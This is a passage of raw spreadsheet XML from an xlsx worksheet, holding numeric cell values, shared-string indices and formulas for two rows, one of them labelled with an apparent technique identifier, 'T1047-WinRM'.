      <c r="CP18" s="107">
        <v>0</v>
      </c>
      <c r="CQ18" s="108">
        <v>0</v>
      </c>
      <c r="CR18" s="109">
        <v>9</v>
      </c>
      <c r="CS18" s="110" t="s">
        <v>1934</v>
      </c>
      <c r="CT18" s="501">
        <v>9</v>
      </c>
      <c r="CU18" s="111" t="s">
        <v>1935</v>
      </c>
      <c r="CV18" s="111">
        <v>9</v>
      </c>
      <c r="CW18" s="112">
        <v>6</v>
      </c>
      <c r="CX18" s="113">
        <v>26</v>
      </c>
      <c r="CY18" s="114" t="s">
        <v>2135</v>
      </c>
      <c r="CZ18" s="503">
        <v>26</v>
      </c>
      <c r="DA18" s="115" t="s">
        <v>2136</v>
      </c>
      <c r="DB18" s="115">
        <v>20</v>
      </c>
      <c r="DC18" s="116">
        <v>17</v>
      </c>
      <c r="DD18" s="101">
        <v>0</v>
      </c>
      <c r="DE18" s="102">
        <v>0</v>
      </c>
      <c r="DF18" s="102">
        <v>0</v>
      </c>
      <c r="DG18" s="103">
        <v>0</v>
      </c>
      <c r="DH18" s="103">
        <v>0</v>
      </c>
      <c r="DI18" s="104">
        <v>0</v>
      </c>
      <c r="DJ18" s="105">
        <v>8</v>
      </c>
      <c r="DK18" s="106" t="s">
        <v>2727</v>
      </c>
      <c r="DL18" s="497">
        <v>8</v>
      </c>
      <c r="DM18" s="107" t="s">
        <v>2728</v>
      </c>
      <c r="DN18" s="107">
        <v>2</v>
      </c>
      <c r="DO18" s="108">
        <v>4</v>
      </c>
      <c r="DP18" s="109">
        <v>8</v>
      </c>
      <c r="DQ18" s="110" t="s">
        <v>2727</v>
      </c>
      <c r="DR18" s="501">
        <v>8</v>
      </c>
      <c r="DS18" s="111" t="s">
        <v>2728</v>
      </c>
      <c r="DT18" s="111">
        <v>2</v>
      </c>
      <c r="DU18" s="112">
        <v>4</v>
      </c>
      <c r="DV18" s="113">
        <v>5</v>
      </c>
      <c r="DW18" s="114" t="s">
        <v>2729</v>
      </c>
      <c r="DX18" s="503">
        <v>5</v>
      </c>
      <c r="DY18" s="115" t="s">
        <v>1894</v>
      </c>
      <c r="DZ18" s="115">
        <v>1</v>
      </c>
      <c r="EA18" s="116">
        <v>5</v>
      </c>
      <c r="EB18" s="250">
        <v>8</v>
      </c>
      <c r="EC18" s="251" t="s">
        <v>2727</v>
      </c>
      <c r="ED18" s="505">
        <v>8</v>
      </c>
      <c r="EE18" s="252" t="s">
        <v>2728</v>
      </c>
      <c r="EF18" s="252">
        <v>2</v>
      </c>
      <c r="EG18" s="253">
        <v>4</v>
      </c>
      <c r="EH18" s="101">
        <v>13</v>
      </c>
      <c r="EI18" s="102" t="s">
        <v>2730</v>
      </c>
      <c r="EJ18" s="102">
        <v>13</v>
      </c>
      <c r="EK18" s="103" t="s">
        <v>2731</v>
      </c>
      <c r="EL18" s="103">
        <v>3</v>
      </c>
      <c r="EM18" s="104">
        <v>5</v>
      </c>
      <c r="EN18" s="105">
        <v>0</v>
      </c>
      <c r="EO18" s="106">
        <v>0</v>
      </c>
      <c r="EP18" s="497">
        <v>0</v>
      </c>
      <c r="EQ18" s="107">
        <v>0</v>
      </c>
      <c r="ER18" s="107">
        <v>0</v>
      </c>
      <c r="ES18" s="108">
        <v>0</v>
      </c>
      <c r="ET18" s="109">
        <v>0</v>
      </c>
      <c r="EU18" s="110">
        <v>0</v>
      </c>
      <c r="EV18" s="501">
        <v>0</v>
      </c>
      <c r="EW18" s="111">
        <v>0</v>
      </c>
      <c r="EX18" s="111">
        <v>0</v>
      </c>
      <c r="EY18" s="112">
        <v>0</v>
      </c>
      <c r="EZ18" s="113">
        <v>8</v>
      </c>
      <c r="FA18" s="114" t="s">
        <v>2727</v>
      </c>
      <c r="FB18" s="503">
        <v>8</v>
      </c>
      <c r="FC18" s="115" t="s">
        <v>2728</v>
      </c>
      <c r="FD18" s="115">
        <v>2</v>
      </c>
      <c r="FE18" s="116">
        <v>4</v>
      </c>
      <c r="FF18" s="101">
        <v>0</v>
      </c>
      <c r="FG18" s="102">
        <v>0</v>
      </c>
      <c r="FH18" s="102">
        <v>0</v>
      </c>
      <c r="FI18" s="103">
        <v>0</v>
      </c>
      <c r="FJ18" s="103">
        <v>0</v>
      </c>
      <c r="FK18" s="104">
        <v>0</v>
      </c>
      <c r="FL18" s="105">
        <v>9</v>
      </c>
      <c r="FM18" s="106" t="s">
        <v>2732</v>
      </c>
      <c r="FN18" s="497">
        <v>9</v>
      </c>
      <c r="FO18" s="107" t="s">
        <v>2733</v>
      </c>
      <c r="FP18" s="107">
        <v>9</v>
      </c>
      <c r="FQ18" s="108">
        <v>9</v>
      </c>
      <c r="FR18" s="109">
        <v>9</v>
      </c>
      <c r="FS18" s="110" t="s">
        <v>2732</v>
      </c>
      <c r="FT18" s="501">
        <v>9</v>
      </c>
      <c r="FU18" s="111" t="s">
        <v>2733</v>
      </c>
      <c r="FV18" s="111">
        <v>9</v>
      </c>
      <c r="FW18" s="112">
        <v>9</v>
      </c>
      <c r="FX18" s="113">
        <v>7</v>
      </c>
      <c r="FY18" s="114" t="s">
        <v>2734</v>
      </c>
      <c r="FZ18" s="503">
        <v>6</v>
      </c>
      <c r="GA18" s="115" t="s">
        <v>2735</v>
      </c>
      <c r="GB18" s="115">
        <v>6</v>
      </c>
      <c r="GC18" s="116">
        <v>6</v>
      </c>
      <c r="GD18" s="250">
        <v>17</v>
      </c>
      <c r="GE18" s="251" t="s">
        <v>2736</v>
      </c>
      <c r="GF18" s="505">
        <v>15</v>
      </c>
      <c r="GG18" s="252" t="s">
        <v>2737</v>
      </c>
      <c r="GH18" s="252">
        <v>15</v>
      </c>
      <c r="GI18" s="253">
        <v>13</v>
      </c>
      <c r="GJ18" s="101">
        <v>24</v>
      </c>
      <c r="GK18" s="102" t="s">
        <v>2738</v>
      </c>
      <c r="GL18" s="102">
        <v>21</v>
      </c>
      <c r="GM18" s="103" t="s">
        <v>2739</v>
      </c>
      <c r="GN18" s="103">
        <v>21</v>
      </c>
      <c r="GO18" s="104">
        <v>14</v>
      </c>
      <c r="GP18" s="105">
        <v>0</v>
      </c>
      <c r="GQ18" s="106">
        <v>0</v>
      </c>
      <c r="GR18" s="497">
        <v>0</v>
      </c>
      <c r="GS18" s="107">
        <v>0</v>
      </c>
      <c r="GT18" s="107">
        <v>0</v>
      </c>
      <c r="GU18" s="108">
        <v>0</v>
      </c>
      <c r="GV18" s="109">
        <v>5</v>
      </c>
      <c r="GW18" s="110" t="s">
        <v>2740</v>
      </c>
      <c r="GX18" s="501">
        <v>5</v>
      </c>
      <c r="GY18" s="111" t="s">
        <v>2741</v>
      </c>
      <c r="GZ18" s="111">
        <v>5</v>
      </c>
      <c r="HA18" s="112">
        <v>5</v>
      </c>
      <c r="HB18" s="113">
        <v>14</v>
      </c>
      <c r="HC18" s="114" t="s">
        <v>2742</v>
      </c>
      <c r="HD18" s="503">
        <v>14</v>
      </c>
      <c r="HE18" s="115" t="s">
        <v>2743</v>
      </c>
      <c r="HF18" s="115">
        <v>14</v>
      </c>
      <c r="HG18" s="116">
        <v>12</v>
      </c>
      <c r="HH18" s="101">
        <v>0</v>
      </c>
      <c r="HI18" s="102">
        <v>0</v>
      </c>
      <c r="HJ18" s="102">
        <v>0</v>
      </c>
      <c r="HK18" s="103">
        <v>0</v>
      </c>
      <c r="HL18" s="103">
        <v>0</v>
      </c>
      <c r="HM18" s="104">
        <v>0</v>
      </c>
      <c r="HN18" s="105">
        <v>0</v>
      </c>
      <c r="HO18" s="106">
        <v>0</v>
      </c>
      <c r="HP18" s="497">
        <v>0</v>
      </c>
      <c r="HQ18" s="107">
        <v>0</v>
      </c>
      <c r="HR18" s="107">
        <v>0</v>
      </c>
      <c r="HS18" s="108">
        <v>0</v>
      </c>
      <c r="HT18" s="109">
        <v>0</v>
      </c>
      <c r="HU18" s="110">
        <v>0</v>
      </c>
      <c r="HV18" s="501">
        <v>0</v>
      </c>
      <c r="HW18" s="111">
        <v>0</v>
      </c>
      <c r="HX18" s="111">
        <v>0</v>
      </c>
      <c r="HY18" s="112">
        <v>0</v>
      </c>
      <c r="HZ18" s="113">
        <v>5</v>
      </c>
      <c r="IA18" s="114" t="s">
        <v>2744</v>
      </c>
      <c r="IB18" s="503">
        <v>5</v>
      </c>
      <c r="IC18" s="115" t="s">
        <v>2745</v>
      </c>
      <c r="ID18" s="115">
        <v>5</v>
      </c>
      <c r="IE18" s="116">
        <v>2</v>
      </c>
      <c r="IF18" s="250">
        <v>4</v>
      </c>
      <c r="IG18" s="251" t="s">
        <v>2746</v>
      </c>
      <c r="IH18" s="505">
        <v>4</v>
      </c>
      <c r="II18" s="252" t="s">
        <v>2747</v>
      </c>
      <c r="IJ18" s="252">
        <v>4</v>
      </c>
      <c r="IK18" s="253">
        <v>1</v>
      </c>
      <c r="IL18" s="101">
        <v>9</v>
      </c>
      <c r="IM18" s="102" t="s">
        <v>2748</v>
      </c>
      <c r="IN18" s="102">
        <v>9</v>
      </c>
      <c r="IO18" s="103" t="s">
        <v>2749</v>
      </c>
      <c r="IP18" s="103">
        <v>9</v>
      </c>
      <c r="IQ18" s="104">
        <v>2</v>
      </c>
      <c r="IR18" s="105">
        <v>0</v>
      </c>
      <c r="IS18" s="106">
        <v>0</v>
      </c>
      <c r="IT18" s="497">
        <v>0</v>
      </c>
      <c r="IU18" s="107">
        <v>0</v>
      </c>
      <c r="IV18" s="107">
        <v>0</v>
      </c>
      <c r="IW18" s="108">
        <v>0</v>
      </c>
      <c r="IX18" s="109">
        <v>4</v>
      </c>
      <c r="IY18" s="110" t="s">
        <v>2750</v>
      </c>
      <c r="IZ18" s="501">
        <v>4</v>
      </c>
      <c r="JA18" s="111" t="s">
        <v>2751</v>
      </c>
      <c r="JB18" s="111">
        <v>4</v>
      </c>
      <c r="JC18" s="112">
        <v>1</v>
      </c>
      <c r="JD18" s="113">
        <v>4</v>
      </c>
      <c r="JE18" s="114" t="s">
        <v>2750</v>
      </c>
      <c r="JF18" s="503">
        <v>4</v>
      </c>
      <c r="JG18" s="115" t="s">
        <v>2751</v>
      </c>
      <c r="JH18" s="115">
        <v>4</v>
      </c>
      <c r="JI18" s="116">
        <v>1</v>
      </c>
      <c r="JJ18" s="101">
        <v>0</v>
      </c>
      <c r="JK18" s="102">
        <v>0</v>
      </c>
      <c r="JL18" s="102">
        <v>0</v>
      </c>
      <c r="JM18" s="103">
        <v>0</v>
      </c>
      <c r="JN18" s="103">
        <v>0</v>
      </c>
      <c r="JO18" s="104">
        <v>0</v>
      </c>
      <c r="JP18" s="105">
        <v>0</v>
      </c>
      <c r="JQ18" s="106">
        <v>0</v>
      </c>
      <c r="JR18" s="497">
        <v>0</v>
      </c>
      <c r="JS18" s="107">
        <v>0</v>
      </c>
      <c r="JT18" s="107">
        <v>0</v>
      </c>
      <c r="JU18" s="108">
        <v>0</v>
      </c>
      <c r="JV18" s="109">
        <v>0</v>
      </c>
      <c r="JW18" s="110">
        <v>0</v>
      </c>
      <c r="JX18" s="501">
        <v>0</v>
      </c>
      <c r="JY18" s="111">
        <v>0</v>
      </c>
      <c r="JZ18" s="111">
        <v>0</v>
      </c>
      <c r="KA18" s="112">
        <v>0</v>
      </c>
      <c r="KB18" s="113">
        <v>0</v>
      </c>
      <c r="KC18" s="114">
        <v>0</v>
      </c>
      <c r="KD18" s="503">
        <v>0</v>
      </c>
      <c r="KE18" s="115">
        <v>0</v>
      </c>
      <c r="KF18" s="115">
        <v>0</v>
      </c>
      <c r="KG18" s="116">
        <v>0</v>
      </c>
      <c r="KH18" s="250">
        <v>0</v>
      </c>
      <c r="KI18" s="251">
        <v>0</v>
      </c>
      <c r="KJ18" s="505">
        <v>0</v>
      </c>
      <c r="KK18" s="252">
        <v>0</v>
      </c>
      <c r="KL18" s="252">
        <v>0</v>
      </c>
      <c r="KM18" s="253">
        <v>0</v>
      </c>
      <c r="KN18" s="101">
        <v>0</v>
      </c>
      <c r="KO18" s="102">
        <v>0</v>
      </c>
      <c r="KP18" s="102">
        <v>0</v>
      </c>
      <c r="KQ18" s="103">
        <v>0</v>
      </c>
      <c r="KR18" s="103">
        <v>0</v>
      </c>
      <c r="KS18" s="104">
        <v>0</v>
      </c>
      <c r="KT18" s="105">
        <v>0</v>
      </c>
      <c r="KU18" s="106">
        <v>0</v>
      </c>
      <c r="KV18" s="497">
        <v>0</v>
      </c>
      <c r="KW18" s="107">
        <v>0</v>
      </c>
      <c r="KX18" s="107">
        <v>0</v>
      </c>
      <c r="KY18" s="108">
        <v>0</v>
      </c>
      <c r="KZ18" s="109">
        <v>0</v>
      </c>
      <c r="LA18" s="110">
        <v>0</v>
      </c>
      <c r="LB18" s="501">
        <v>0</v>
      </c>
      <c r="LC18" s="111">
        <v>0</v>
      </c>
      <c r="LD18" s="111">
        <v>0</v>
      </c>
      <c r="LE18" s="112">
        <v>0</v>
      </c>
      <c r="LF18" s="113">
        <v>0</v>
      </c>
      <c r="LG18" s="114">
        <v>0</v>
      </c>
      <c r="LH18" s="503">
        <v>0</v>
      </c>
      <c r="LI18" s="115">
        <v>0</v>
      </c>
      <c r="LJ18" s="115">
        <v>0</v>
      </c>
      <c r="LK18" s="116">
        <v>0</v>
      </c>
      <c r="LL18" s="117">
        <v>30</v>
      </c>
      <c r="LM18" s="507">
        <v>30</v>
      </c>
      <c r="LN18" s="119">
        <v>3</v>
      </c>
      <c r="LO18" s="119">
        <v>8</v>
      </c>
      <c r="LP18" s="119">
        <v>24</v>
      </c>
      <c r="LQ18" s="119">
        <v>11</v>
      </c>
      <c r="LR18" s="119">
        <v>18</v>
      </c>
      <c r="LS18" s="119">
        <v>24</v>
      </c>
      <c r="LT18" s="382"/>
      <c r="LU18" s="117">
        <v>0</v>
      </c>
      <c r="LV18" s="118">
        <v>0</v>
      </c>
      <c r="LW18" s="507">
        <v>0</v>
      </c>
      <c r="LX18" s="119">
        <v>0</v>
      </c>
      <c r="LY18" s="119">
        <v>0</v>
      </c>
      <c r="LZ18" s="119">
        <v>0</v>
      </c>
      <c r="MA18" s="117">
        <v>10</v>
      </c>
      <c r="MB18" s="118" t="s">
        <v>4178</v>
      </c>
      <c r="MC18" s="507">
        <v>10</v>
      </c>
      <c r="MD18" s="119" t="s">
        <v>2752</v>
      </c>
      <c r="ME18" s="119">
        <v>2</v>
      </c>
      <c r="MF18" s="119">
        <v>10</v>
      </c>
      <c r="MG18" s="117">
        <v>1</v>
      </c>
      <c r="MH18" s="118" t="s">
        <v>4179</v>
      </c>
      <c r="MI18" s="507">
        <v>1</v>
      </c>
      <c r="MJ18" s="119" t="s">
        <v>2753</v>
      </c>
      <c r="MK18" s="119">
        <v>1</v>
      </c>
      <c r="ML18" s="119">
        <v>1</v>
      </c>
      <c r="MM18" s="117">
        <v>0</v>
      </c>
      <c r="MN18" s="118">
        <v>0</v>
      </c>
      <c r="MO18" s="507">
        <v>0</v>
      </c>
      <c r="MP18" s="119">
        <v>0</v>
      </c>
      <c r="MQ18" s="119">
        <v>0</v>
      </c>
      <c r="MR18" s="119">
        <v>0</v>
      </c>
      <c r="MS18" s="117">
        <v>0</v>
      </c>
      <c r="MT18" s="118">
        <v>0</v>
      </c>
      <c r="MU18" s="507">
        <v>0</v>
      </c>
      <c r="MV18" s="119">
        <v>0</v>
      </c>
      <c r="MW18" s="119">
        <v>0</v>
      </c>
      <c r="MX18" s="119">
        <v>0</v>
      </c>
      <c r="MY18" s="117">
        <v>0</v>
      </c>
      <c r="MZ18" s="118">
        <v>0</v>
      </c>
      <c r="NA18" s="507">
        <v>0</v>
      </c>
      <c r="NB18" s="119">
        <v>0</v>
      </c>
      <c r="NC18" s="119">
        <v>0</v>
      </c>
      <c r="ND18" s="119">
        <v>0</v>
      </c>
      <c r="NE18" s="117">
        <v>1</v>
      </c>
      <c r="NF18" s="118" t="s">
        <v>4180</v>
      </c>
      <c r="NG18" s="507">
        <v>1</v>
      </c>
      <c r="NH18" s="119" t="s">
        <v>2754</v>
      </c>
      <c r="NI18" s="119">
        <v>1</v>
      </c>
      <c r="NJ18" s="119">
        <v>1</v>
      </c>
      <c r="NK18" s="117">
        <v>8</v>
      </c>
      <c r="NL18" s="118" t="s">
        <v>4200</v>
      </c>
      <c r="NM18" s="507">
        <v>8</v>
      </c>
      <c r="NN18" s="119" t="s">
        <v>2638</v>
      </c>
      <c r="NO18" s="119">
        <v>1</v>
      </c>
      <c r="NP18" s="119">
        <v>8</v>
      </c>
      <c r="NQ18" s="117">
        <v>0</v>
      </c>
      <c r="NR18" s="118">
        <v>0</v>
      </c>
      <c r="NS18" s="507">
        <v>0</v>
      </c>
      <c r="NT18" s="119">
        <v>0</v>
      </c>
      <c r="NU18" s="119">
        <v>0</v>
      </c>
      <c r="NV18" s="119">
        <v>0</v>
      </c>
      <c r="NW18" s="117">
        <v>10</v>
      </c>
      <c r="NX18" s="118" t="s">
        <v>4330</v>
      </c>
      <c r="NY18" s="507">
        <v>10</v>
      </c>
      <c r="NZ18" s="119" t="s">
        <v>4331</v>
      </c>
      <c r="OA18" s="119">
        <v>6</v>
      </c>
      <c r="OB18" s="119">
        <v>10</v>
      </c>
      <c r="OC18" s="120">
        <v>12</v>
      </c>
      <c r="OD18" s="120">
        <v>12</v>
      </c>
      <c r="OE18" s="120">
        <v>5</v>
      </c>
      <c r="OF18" s="121">
        <v>4</v>
      </c>
      <c r="OG18" s="120">
        <v>10</v>
      </c>
      <c r="OH18" s="120">
        <v>10</v>
      </c>
      <c r="OI18" s="120">
        <v>10</v>
      </c>
      <c r="OJ18" s="120">
        <v>10</v>
      </c>
      <c r="OK18" s="383"/>
      <c r="OL18" s="120">
        <v>9</v>
      </c>
      <c r="OM18" s="120">
        <v>9</v>
      </c>
      <c r="ON18" s="120">
        <v>9</v>
      </c>
      <c r="OO18" s="120" t="s">
        <v>2755</v>
      </c>
      <c r="OP18" s="120">
        <v>2</v>
      </c>
      <c r="OQ18" s="464">
        <v>9</v>
      </c>
      <c r="OR18" s="120">
        <v>1</v>
      </c>
      <c r="OS18" s="120">
        <v>1</v>
      </c>
      <c r="OT18" s="120">
        <v>1</v>
      </c>
      <c r="OU18" s="120" t="s">
        <v>2756</v>
      </c>
      <c r="OV18" s="120">
        <v>1</v>
      </c>
      <c r="OW18" s="464">
        <v>1</v>
      </c>
      <c r="OX18" s="120">
        <v>2</v>
      </c>
      <c r="OY18" s="120">
        <v>2</v>
      </c>
      <c r="OZ18" s="120">
        <v>2</v>
      </c>
      <c r="PA18" s="120" t="s">
        <v>2757</v>
      </c>
      <c r="PB18" s="120">
        <v>2</v>
      </c>
      <c r="PC18" s="464">
        <v>2</v>
      </c>
      <c r="PD18" s="120">
        <v>0</v>
      </c>
      <c r="PE18" s="120">
        <v>0</v>
      </c>
      <c r="PF18" s="120">
        <v>0</v>
      </c>
      <c r="PG18" s="120"/>
      <c r="PH18" s="120">
        <v>0</v>
      </c>
      <c r="PI18" s="464">
        <v>0</v>
      </c>
      <c r="PJ18" s="120">
        <v>0</v>
      </c>
      <c r="PK18" s="120">
        <v>0</v>
      </c>
      <c r="PL18" s="120">
        <v>0</v>
      </c>
      <c r="PM18" s="120"/>
      <c r="PN18" s="120">
        <v>0</v>
      </c>
      <c r="PO18" s="464">
        <v>0</v>
      </c>
      <c r="PP18" s="120">
        <v>0</v>
      </c>
      <c r="PQ18" s="120">
        <v>0</v>
      </c>
      <c r="PR18" s="120">
        <v>0</v>
      </c>
      <c r="PS18" s="120"/>
      <c r="PT18" s="120">
        <v>0</v>
      </c>
      <c r="PU18" s="464">
        <v>0</v>
      </c>
      <c r="PV18" s="120">
        <v>2</v>
      </c>
      <c r="PW18" s="120">
        <v>2</v>
      </c>
      <c r="PX18" s="120">
        <v>1</v>
      </c>
      <c r="PY18" s="120" t="s">
        <v>4439</v>
      </c>
      <c r="PZ18" s="120">
        <v>1</v>
      </c>
      <c r="QA18" s="464">
        <v>1</v>
      </c>
      <c r="QB18" s="120">
        <v>1</v>
      </c>
      <c r="QC18" s="120">
        <v>1</v>
      </c>
      <c r="QD18" s="120">
        <v>1</v>
      </c>
      <c r="QE18" s="120" t="s">
        <v>4440</v>
      </c>
      <c r="QF18" s="120">
        <v>1</v>
      </c>
      <c r="QG18" s="464">
        <v>1</v>
      </c>
      <c r="QH18" s="120">
        <v>9</v>
      </c>
      <c r="QI18" s="120">
        <v>9</v>
      </c>
      <c r="QJ18" s="120">
        <v>8</v>
      </c>
      <c r="QK18" s="120" t="s">
        <v>2640</v>
      </c>
      <c r="QL18" s="120">
        <v>2</v>
      </c>
      <c r="QM18" s="464">
        <v>8</v>
      </c>
      <c r="QN18" s="120">
        <v>0</v>
      </c>
      <c r="QO18" s="120">
        <v>0</v>
      </c>
      <c r="QP18" s="120">
        <v>0</v>
      </c>
      <c r="QQ18" s="120"/>
      <c r="QR18" s="120">
        <v>0</v>
      </c>
      <c r="QS18" s="464">
        <v>0</v>
      </c>
      <c r="QT18" s="184"/>
      <c r="QU18" s="184"/>
      <c r="QV18" s="184"/>
      <c r="QW18" s="184"/>
      <c r="QX18" s="184"/>
      <c r="QY18" s="184"/>
      <c r="QZ18" s="184"/>
      <c r="RA18" s="184"/>
      <c r="RB18" s="184"/>
      <c r="RC18" s="184"/>
      <c r="RD18" s="184"/>
      <c r="RE18" s="184"/>
      <c r="RF18" s="184"/>
      <c r="RG18" s="184"/>
      <c r="RH18" s="184"/>
      <c r="RI18" s="184"/>
      <c r="RJ18" s="184"/>
      <c r="RK18" s="184"/>
      <c r="RL18" s="184"/>
      <c r="RM18" s="184"/>
      <c r="RN18" s="184"/>
      <c r="RO18" s="184"/>
      <c r="RP18" s="184"/>
      <c r="RQ18" s="184"/>
      <c r="RR18" s="184"/>
      <c r="RS18" s="184"/>
      <c r="RT18" s="184"/>
      <c r="RU18" s="184"/>
      <c r="RV18" s="184"/>
      <c r="RW18" s="184"/>
      <c r="RX18" s="184"/>
      <c r="RY18" s="184"/>
      <c r="RZ18" s="184"/>
      <c r="SA18" s="184"/>
      <c r="SB18" s="184"/>
      <c r="SC18" s="184"/>
      <c r="SD18" s="184"/>
      <c r="SE18" s="184"/>
      <c r="SF18" s="184"/>
      <c r="SG18" s="184"/>
      <c r="SH18" s="184"/>
      <c r="SI18" s="184"/>
      <c r="SJ18" s="184"/>
      <c r="SK18" s="184"/>
      <c r="SL18" s="184"/>
      <c r="SM18" s="184"/>
      <c r="SN18" s="184"/>
      <c r="SO18" s="184"/>
      <c r="SP18" s="184"/>
      <c r="SQ18" s="184"/>
      <c r="SR18" s="184"/>
      <c r="SS18" s="184"/>
      <c r="ST18" s="184"/>
      <c r="SU18" s="184"/>
      <c r="SV18" s="184"/>
      <c r="SW18" s="184"/>
      <c r="SX18" s="184"/>
      <c r="SY18" s="184"/>
      <c r="SZ18" s="184"/>
      <c r="TA18" s="184"/>
      <c r="TB18" s="184"/>
      <c r="TC18" s="184"/>
      <c r="TD18" s="184"/>
      <c r="TE18" s="184"/>
      <c r="TF18" s="184"/>
      <c r="TG18" s="184"/>
      <c r="TH18" s="184"/>
      <c r="TI18" s="184"/>
      <c r="TJ18" s="184"/>
      <c r="TK18" s="184"/>
      <c r="TL18" s="184"/>
      <c r="TM18" s="184"/>
      <c r="TN18" s="184"/>
      <c r="TO18" s="184"/>
      <c r="TP18" s="184"/>
      <c r="TQ18" s="184"/>
      <c r="TR18" s="184"/>
      <c r="TS18" s="184"/>
      <c r="TT18" s="184"/>
      <c r="TU18" s="184"/>
      <c r="TV18" s="184"/>
      <c r="TW18" s="184"/>
      <c r="TX18" s="184"/>
      <c r="TY18" s="184"/>
      <c r="TZ18" s="184"/>
      <c r="UA18" s="184"/>
      <c r="UB18" s="184"/>
      <c r="UC18" s="184"/>
      <c r="UD18" s="184"/>
      <c r="UE18" s="184"/>
      <c r="UF18" s="184"/>
      <c r="UG18" s="184"/>
      <c r="UH18" s="184"/>
      <c r="UI18" s="184"/>
      <c r="UJ18" s="184"/>
      <c r="UK18" s="184"/>
      <c r="UL18" s="184"/>
      <c r="UM18" s="184"/>
      <c r="UN18" s="184"/>
      <c r="UO18" s="184"/>
      <c r="UP18" s="184"/>
      <c r="UQ18" s="184"/>
      <c r="UR18" s="184"/>
      <c r="US18" s="184"/>
      <c r="UT18" s="184"/>
      <c r="UU18" s="184"/>
      <c r="UV18" s="184"/>
      <c r="UW18" s="184"/>
      <c r="UX18" s="184"/>
      <c r="UY18" s="184"/>
      <c r="UZ18" s="184"/>
      <c r="VA18" s="184"/>
      <c r="VB18" s="184"/>
      <c r="VC18" s="184"/>
      <c r="VD18" s="184"/>
      <c r="VE18" s="184"/>
      <c r="VF18" s="184"/>
      <c r="VG18" s="184"/>
      <c r="VH18" s="184"/>
      <c r="VI18" s="184"/>
      <c r="VJ18" s="184"/>
      <c r="VK18" s="184"/>
      <c r="VL18" s="184"/>
      <c r="VM18" s="184"/>
      <c r="VN18" s="184"/>
      <c r="VO18" s="184"/>
      <c r="VP18" s="184"/>
      <c r="VQ18" s="184"/>
      <c r="VR18" s="184"/>
      <c r="VS18" s="184"/>
      <c r="VT18" s="184"/>
      <c r="VU18" s="184"/>
      <c r="VV18" s="184"/>
      <c r="VW18" s="184"/>
      <c r="VX18" s="184"/>
      <c r="VY18" s="184"/>
    </row>
    <row r="19" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A19" s="82" t="s">
        <v>39</v>
      </c>
      <c r="B19" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C19" s="83" t="s">
        <v>344</v>
      </c>
      <c r="D19" s="83" t="s">
        <v>40</v>
      </c>
      <c r="E19" s="83">
        <f t="shared" si="2"/>
        <v>14</v>
      </c>
      <c r="F19" s="83" t="s">
        <v>41</v>
      </c>
      <c r="G19" s="83" t="s">
        <v>4</v>
      </c>
      <c r="H19" s="83" t="s">
        <v>4</v>
      </c>
      <c r="I19" s="81" t="s">
        <v>900</v>
      </c>
      <c r="J19" s="85" t="s">
        <v>827</v>
      </c>
      <c r="K19" s="81" t="s">
        <v>901</v>
      </c>
      <c r="L19" s="81" t="s">
        <v>902</v>
      </c>
      <c r="M19" s="378" t="s">
        <v>193</v>
      </c>
      <c r="N19" s="74" t="str">
        <f t="shared" si="0"/>
        <v>OK</v>
      </c>
      <c r="O19" s="485" t="str">
        <f t="shared" si="1"/>
        <v>New</v>
      </c>
      <c r="P19" s="91"/>
      <c r="Q19" s="379" t="s">
        <v>745</v>
      </c>
      <c r="R19" s="92" t="s">
        <v>903</v>
      </c>
      <c r="S19" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T19" s="92" t="s">
        <v>904</v>
      </c>
      <c r="U19" s="94" t="s">
        <v>905</v>
      </c>
      <c r="V19" s="95" t="s">
        <v>751</v>
      </c>
      <c r="W19" s="96" t="s">
        <v>906</v>
      </c>
      <c r="X19" s="97" t="s">
        <v>907</v>
      </c>
      <c r="Y19" s="83" t="s">
        <v>908</v>
      </c>
      <c r="Z19" s="188" t="s">
        <v>909</v>
      </c>
      <c r="AA19" s="182" t="s">
        <v>745</v>
      </c>
      <c r="AB19" s="183" t="s">
        <v>745</v>
      </c>
      <c r="AC19" s="302" t="s">
        <v>745</v>
      </c>
      <c r="AD19" s="83"/>
      <c r="AE19" s="83"/>
      <c r="AF19" s="384" t="s">
        <v>4</v>
      </c>
      <c r="AG19" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH19" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI19" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ19" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK19" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL19" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM19" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN19" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO19" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP19" s="385" t="str">
        <f>M19&amp;"-frag"</f>
        <v>T1047-WinRM-frag</v>
      </c>
      <c r="AQ19" s="646">
        <v>912</v>
      </c>
      <c r="AR19" s="100"/>
      <c r="AS19" s="100">
        <v>450</v>
      </c>
      <c r="AT19" s="100">
        <v>1</v>
      </c>
      <c r="AU19" s="100">
        <v>451</v>
      </c>
      <c r="AV19" s="92" t="s">
        <v>910</v>
      </c>
      <c r="AW19" s="100">
        <v>450</v>
      </c>
      <c r="AX19" s="100">
        <v>450</v>
      </c>
      <c r="AY19" s="100">
        <v>1</v>
      </c>
      <c r="AZ19" s="100">
        <v>451</v>
      </c>
      <c r="BA19" s="381" t="s">
        <v>4873</v>
      </c>
      <c r="BB19" s="101">
        <v>13</v>
      </c>
      <c r="BC19" s="102" t="s">
        <v>2758</v>
      </c>
      <c r="BD19" s="102">
        <v>5</v>
      </c>
      <c r="BE19" s="103" t="s">
        <v>2759</v>
      </c>
      <c r="BF19" s="103">
        <v>3</v>
      </c>
      <c r="BG19" s="104">
        <v>3</v>
      </c>
      <c r="BH19" s="190">
        <v>1369</v>
      </c>
      <c r="BI19" s="191" t="s">
        <v>2760</v>
      </c>
      <c r="BJ19" s="498">
        <v>1322</v>
      </c>
      <c r="BK19" s="192" t="s">
        <v>2761</v>
      </c>
      <c r="BL19" s="192">
        <v>6</v>
      </c>
      <c r="BM19" s="108">
        <v>878</v>
      </c>
      <c r="BN19" s="109">
        <v>1382</v>
      </c>
      <c r="BO19" s="110" t="s">
        <v>1992</v>
      </c>
      <c r="BP19" s="501">
        <v>1327</v>
      </c>
      <c r="BQ19" s="111" t="s">
        <v>1993</v>
      </c>
      <c r="BR19" s="111">
        <v>9</v>
      </c>
      <c r="BS19" s="112">
        <v>878</v>
      </c>
      <c r="BT19" s="113">
        <v>959</v>
